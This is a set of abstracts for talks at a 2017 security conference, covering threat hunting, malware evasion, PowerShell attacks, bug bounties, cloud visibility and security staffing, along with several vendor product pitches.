In today's threat landscape, modern security teams recognise that compromise is inevitable. However, that does not mean that a breach should be inevitable too.
Today's security leaders must bring together the people, process and technology to enable threat hunting. Detect and alert strategies need to be revamped to shift from reactive forms of incident response to proactive threat hunting.
Join Rick McElroy, Security Strategist for Carbon Black, to learn how better to enable your hunt.
Key takeaways:
1. Understand the role of threat hunting in a resilient cybersecurity strategy
2. Learn how to create a culture of threat hunting and embed it within your security strategy
3. Discover how to mature your threat hunting program
4. Learn how to create an ROI for threat hunting
5. Gain practical insight into the steps to take in order to start threat hunting
Through the first three quarters of this year, up to 47% of malware detected by WatchGuard evaded signature-based protections. To explain how this could happen, we will walk through popular signature-evasion techniques, including code packing and polymorphism, and discuss how they help malware authors hide from traditional antivirus. Furthermore, we will show actual examples of these techniques in action with various malware samples. This talk will highlight the need for multi-layer security including behavioral-based malware detection.
In the era of DevSecOps, CI/CD and Agile development many companies still become victims of disastrous data breaches caused by insecure applications. The presentation explains an application security strategy to reduce costs and assure holistic Application Security Testing (AST) of corporate web and mobile applications. The talk will also encompass application inventory and discovery, vulnerability correlation, virtual patching and practical usage of Machine Learning in application security.
The security industry has recognized for some time that manual processes are no longer capable of achieving the velocity required to effectively and rapidly respond to cyber threats. Security teams want to automate incident response operations, but remain unable to do so for three primary reasons:
1. They can assess the impact of a threat, but not its impact on production
2. They can automate the actions, but not the decisions
3. Their IT Operations counterparts do not trust automation
In this session, Mr. Rochford will address each of these concerns, as well as if and how they can be safely overcome.
Most people don't have movies and TV shows made about their jobs. X-Force Red does. X-Force Red is IBM's new elite team of what the security industry calls penetration testers but most people call them hackers. It's a common misunderstanding that "hacker" refers to a computer criminal. Our team attacks networks and applications from technologies such as cloud, mobile, IoT, and just about anything else before the bad guys. In many ways, penetration testing is more challenging than what criminals do. Criminals only need to find one way in, but X-Force Red testers aim to find all the flaws in their target, then help the client fix them. Come to this session to hear some real-world stories of legal hacking… some funny, some scary.
Nominet brings its industry-leading machine learning and analytics capabilities to cyber risk management to bolster a company's security posture and mitigate risks associated with cyber threats. Powered by its DNS-based Active Defence platform, Nominet analyses the organisation's DNS traffic through data correlation against integrated threat intelligence feeds to produce rich, actionable insights that remove threats via policy development. Nominet's cyber experts work with customers to develop advanced risk mitigation strategies benchmarked against sector best practices and tailored to their specific network capabilities and configurations. With a light-touch, flexible data ingestion model, Nominet delivers value to customers quickly and effectively with a holistic network security rating, incorporating internal and external cyber activity with pinpoint accuracy. The cyber risk management framework extends to third party risk assessments and supplier scoring for comprehensive supply chain cyber awareness.
Bug bounties are becoming better understood and more deeply embedded into the information security industry. The number of enterprise organisations, researchers, and bounty pay-outs are on the rise and there is also a notable increase in the criticality of submissions. Adoption is increasing remarkably fast and expectations are that it will continue to do so for the foreseeable future. The area of responsible reporting is far from resolved, yet despite the challenges that remain, bug bounty programmes are being launched at a remarkable pace, facing many of the same challenges. There is evidence of both good and bad practice in the bug bounty marketplace have been looking at how to better understand bug bounty programmes, consider how such programmes sit in wider technical assurance frameworks, provide advice to the buyers of such services, protect the interests of those participating in programmes and finally, where appropriate, improve the bug bounty landscape.
As the need for qualified security professionals rises, the industry needs to tackle the skills shortage head-on and encourage the very best people to choose cybersecurity as a career. While cybersecurity is an extremely challenging, exciting and rewarding career, it is essential to also ensure the industry promotes best practice and ethics while developing a clear professional career path.
Recently, innovations in crowdsourced security show that motivated and prepared hackers outperform advanced scanning, bug bounty, and ordinary pen testing approaches. When armed with a software platform built for ethical hacking, security testing dramatically improves. It holds true whether the testing is for general vulnerability discovery, compliance, or implementing DevSecOps in a secure software development lifecycle.
Crowdsourced Penetration Testing lets organizations see and control the testing process and finds severe vulnerabilities before attackers do.
Find out the results leading organizations in Europe and elsewhere get when adopting a software and crowdsourced approach to security.
With an exponential rise in data breaches it is clear that traditional methods such as DLP, network and endpoint security is still failing. Other business pressures such as regulation, drive for innovation and extensive collaboration call for a new approach to address these risks. Covata views Data as the New Endpoint and through its Data Security Platform enable organisations to Discover, Protect and Control every piece of unstructured data regardless of where it resides. Come and discover this new perspective and gain insight into the best defence for your organisation whilst delivering information governance best practice.
The need to manage security threats in the cloud will only grow - IT execs expect 60 percent of workloads to run in the cloud by 2018. While many concerns about cloud security have abated, a huge stumbling block remains: cloud visibility. Lack of visibility into cloud activity has been the #1 cloud security problem plaguing cloud-focused IT organizations, according to the SANS institute.
Led by ProtectWise Co-Founder and CTO Gene Stevens, this session will help you understand how to gain pervasive visibility, automated threat detection and unlimited forensic exploration for enterprise activity wherever it occurs - in the cloud, of course, but also in hybrid environments, within the enterprise or on industrial control systems.
With an increasing pace of change and adoption of new technologies such as the Internet of Things, new platforms on which we deploy including public cloud, and new ways and places of working, brought about by the transitional and evolving nature of businesses, security visibility becomes ever-more critical, yet more challenging.
Gaining a clear understanding of IT infrastructure, hosts and critical applications, vulnerabilities to which they may be susceptible and the ability to demonstrate compliance against regulatory and organisational mandates is a task made more difficult by the transitional nature of business and underlying technologies. In this session we look at some of those challenges and the changing response to adapt and regain visibility in order to respond timely to critical events such as Wannacry, and wide-ranging initiatives such as GDPR.
Computer Security is an uphill battle. Fileless malware is another, in a long line of techniques, designed to circumvent the protection being offered by AV vendors. In this we examine a recently seen example of fileless malware and the impact it can have on a system.
As attacks are getting more sophisticated, it is no longer a question of if you are going to be breached but when. Security threat prevention is still effective in blocking the vast majority of threats, but the sheer volume of attacks and associated security events means it is often hard to investigate each event using conventional tools meaning breaches will go unnoticed and uninvestigated. Time is of the essence and any solutions that can help reduce the time it takes to detect breaches and contain threats is extremely valuable. Part of the solution is advanced threat detection where anomalies in network behavior can be detected and linked to security event information to raise the priority of an event. In addition to that, security threat prevention solutions can be enhanced with the ability to provide all the details required to investigate an event faster so more events can be examined quicker. Circumstantial evidence based on flow records and event logs are no longer enough – detailed packet data available on-demand so that all the details can be seen and examined quickly is the only way to get to the hard facts and determine quickly if there is an issue or not.
The future of software development is the "full spectrum engineer". The speed demands of modern development require not just the ability to move up and down the stack, but across the spectrum of processes from design, coding, functional and non-functional testing and deployment. Maximizing velocity requires the work of one engineer to be available to the customer without coordination with others. This means the "full spectrum engineer" must have the capability of also securing their own work. The future software engineer will know about software security and will have automated tools at their disposal. We will still have specialists to go deep but software security will no longer be thought of as a specialist discipline.
Someone breaking into your network is inevitable. Threat intelligence is a lifeblood when investigating a potential break-in. While threat intelligence sharing is common practice via ISACs or informal networks, most is typically missing context and relevancy for organizations. But when a trusted set of peers can share threat intelligence anonymously and it's combined with automation and orchestration, they can dramatically improve their ability to quickly thwart attacks – even proactively. This talk outlines how to share threat intelligence anonymously and leverage an enterprise security response engine to reduce the time to identify and respond to breach from weeks down to minutes.
SecureLink Research Chief shares interconnected war stories on the underground, ransom ware and geo political threat. He'll extrapolate their impact and risk to your organization, and indulge in a small peek into the future.
Today's cyberthreats are cunning and persistent, taking advantage of unmonitored assets and your brand's digital presence to wreak havoc outside the protection of your firewall. RiskIQ gives you the perspective of an attacker, discovering where you're exposed and what needs to be protected, as well as detecting digital threats against you and your brand, like phishing, brand abuse, social media imposters, and rogue or compromised mobile apps. If you're addressing these types of threats in a manual or one-off way, you're working too hard. Work smarter by unifying and automating the detection-to-mitigation processes to protect your business, brand, and customers. We'll show you how.
Distributed Denial of Service (DDoS) attacks are one of the biggest headaches for website owners and Internet infrastructure operators alike. The coming IoT CyberWar against the Internet and the Domain Name System (DNS) is going to be launched from millions of webcams, lightbulbs, toilet seats and smart thermostats, all networked inside your home and running on high bandwidth. We show how the IoT CyberWar is poised to overcome known defense mechanisms, and wreak a path of havoc and destruction never before seen. IoT based DDoS could be the Armageddon we all have been hoping against.
Organizations are investing in cybersecurity on an unprecedented scale and spending is reaching unsustainable levels as boards tire of endless requests to increase the budget. Yet the number of security breaches and overall cost of cybercrime is on the rise—a massive US$21.2 million in the last year on average for the US. Organizations need to recognize that spending alone does not always equate to value. Many organizations are spending too much on the wrong technologies. Making wise security investments in breakthrough security technologies like advanced analytics and artificial intelligence can help to make a difference and better protect organizations in today's threat landscape.
To detect unknown malware, organizations need a new approach that doesn't rely on malware signatures and learning from what past malware looks like and how it behaves. This Negative Security Model approach that detects "the bad" falls short because it can't keep up with a practically infinite number of new malware samples. A Positive Security Model that focuses on understanding a finite set of legitimate system behavior offers more foolproof detection. When behavior isn't following a normal path, the Positive Security Model assumes it's "bad" and prevents it from executing, no matter what attack vector or method is being used.
While IT and security technology continue to evolve, most security experts – and most attackers – agree that people are the weakest link in any information system. How do today's attackers fool users into giving up their credentials or downloading malicious code? What are the latest methods in this "social engineering," and what types of attacks are you likely to experience in your organization? And most importantly, what can your enterprise do to prevent these social engineering attacks? In this session, top experts will discuss the latest social engineering exploits, and offer some advice on how you can mitigate them.
The prevalence of ransomware is an artefact of the current state of cybersecurity. In this talk, learn the various recognised mechanisms that ransomware creators use to elicit compliance, payment and even sympathy from the people they infect. Using this knowledge, you will be able to better educate yourselves and your users about how to stay calm when under cyber attack, and how to gauge your next steps.
Malware is dead; it's still out there but is used for smash-and-grab, in-your-eye pokes or as distraction at most. The real threat has moved to higher ground, and PowerShell is King there. PowerShell is the vector for over 80% fileless malware executions in attacks. The majority of market endpoint protection solutions either bluntly stop all Powershell sessions or stop nothing as they don't have granular insight intoPowerShell sessions, so sophisticated attackers exploit it by running malicious and obfuscated code inside PowerShell thus infecting the endpoint without being detected or blocked.
Cybereason has announced the unique ability to gain visibility and control on what PowerShell is running within a session. Cybereason analyses all the commands PowerShell attempts to execute and blocks the execution of malicious commands, even if they are obfuscated. The result: scoped PowerShell use and high malop detection rates with low false positives. This session will discuss Powershell attacks and how Cybereason is uniquely able to shut down the Motorway to attackers while still letting administrators use this most versatile of toolkits.
In recent years, the scale of cyber-attacks has grown at an alarming rate. Security vendors are constantly on the lookout for new ways of providing effective protection. At Fortinet we have been using different forms of artificial intelligence for many years in order to classify threats, detect malicious activity, and create actionable intelligence to protect our customers.
This presentation will provide an overview of AI techniques and show how they are used, in conjunction with good old-fashioned human analysis, to fuel world class cyber security solutions.
There has been much speculation (not to mention exaggeration) over recent years about the fabled dark web. We've heard how this shady underworld is the refuge of the cybercriminal elite and even nation-state threat actors. That this is their "Wolf's Lair," where they gather to plot the breaching of businesses, the downfall of governments, and the hacking of celebrities.
As with much mainstream reporting of technology, and cyber threats in particular, there's a grain of truth here. This less accessible and more volatile corner of the internet as we know it does offer those with less honorable motives a secret marketplace for their wares.
The confusing terminology around what the dark web is or isn't shouldn't be a barrier to defenders realizing the potential benefits of information gathered from these anonymous communities, and how it can be used to produce valuable threat intelligence.
It's estimated that there may be as many as 1.5 million unfilled positions in the global cybersecurity industry over the next few years. How will security departments respond to these staffing shortages? Where can enterprises find new security talent? And how can today's cybersecurity professionals take advantage of the skills shortage to advance their own careers? In this session, top experts in security team management and hiring will discuss tactics you can use to make better use of your personnel resources – and how you can get the training and skills you need to increase your value to your organization, as well as others that might be hiring.
AI equips security teams with the automation necessary to keep pace with the speed and sophistication of today's cyber-attacks. But how do you transition to using AI in your enterprise? Hear real-world use cases of the Enterprise Immune System from organizations using AI to detect and autonomously fight back against threats.
An Adversary's Playbook is the organized collection of the Tools, Techniques and Procedures (TTPs) employed during their attack lifecycle. As adversaries do not share their playbooks with defenders, we must derive them through observations of live attacks, shared information and intelligence analysis.
Pragmatic adversaries often re-use elements of attacks, so defenders can use the tracked data to identify attacks perpetrated by the same adversary and better prepare for future attacks.
Adversaries have a limited number of techniques they can employee when targeting a network; They share TTPs with others and that means a single defense can defend against multiple adversaries.
Do you think email is immutable once delivered? The ROPEMAKER exploit shows this is not the case! We will introduce the exploit, disclose the latest research covering it, and show a live demonstration of the exploit in action. The presenters will also offer some mitigation techniques to help address this attack while also highlighting potential consequences of an attacker using it in the wild.
The earlier you detect and mitigate a threat, the less the ultimate cost to your business. By implementing an effective end-to-end threat management process that focuses on reducing detection and response times, you will have the ability to prevent high-impact security incidents, such as major data breaches. This process is known as Threat Lifecycle Management (TLM) and can help you improve the efficiency of your security operations.
- Determine if your spending is focused on the right areas.
- Understand how to prevent high-impact cyber incidents.
- Discover how can you lower your TCO and maximise the ROI of your security technology.
This briefing will describe the process and methods used to analyse applications for unknown vulnerabilities. Those in attendance will gain insights in the complex analysis techniques for both open and closed source applications. Highlighting the various tools and techniques to identify potential inputs to applications and test those inputs for vulnerabilities. Demonstrations of static analysis and various tools, techniques and procedures for identifying and researching vulnerabilities which often go undetected by vulnerability scanners.
No matter what your industry, you are likely wrestling to build security for Internet-connected devices that are not computers or smartphones. Whether you're controlling access to medical devices, oil rigs, retail systems, or manufacturing equipment, you're being challenged to extend the traditional network security perimeter to protect a whole new class of devices and systems. In this session, top experts will discuss trends in IoT attacks and threats and offer some best practices for securing IoT devices.
With increasingly sophisticated security threats, threat prevention solutions must perform advanced security functions under constantly rising and more complex user traffic. This session will delve into how preemptive intelligence from performance and security testing allows you to deploy the most robust and security network infrastructures possible. The evolution to Transport Layer Security (TLS) will improve security and performance for network traffic, but it also brings its own challenges. Cyber criminals hide in encrypted traffic, so organizations must decrypt traffic at network gateways in order to inspect it and know how to handle it.
From measuring business risk to mitigating sophisticate attacks, IT security has become a complex combination of tasks and priorities. How are IT security pros setting those priorities in 2017? What are their biggest concerns, and where are they investing their time and money? In this session, you'll hear the results of new surveys conducted by Black Hat and Dark Reading that answer some of these questions. You'll get some real data on how enterprises are investing their cybersecurity resources, how they are responding to new threats, and how they are managing the internal struggles that may affect their ability to protect critical business data.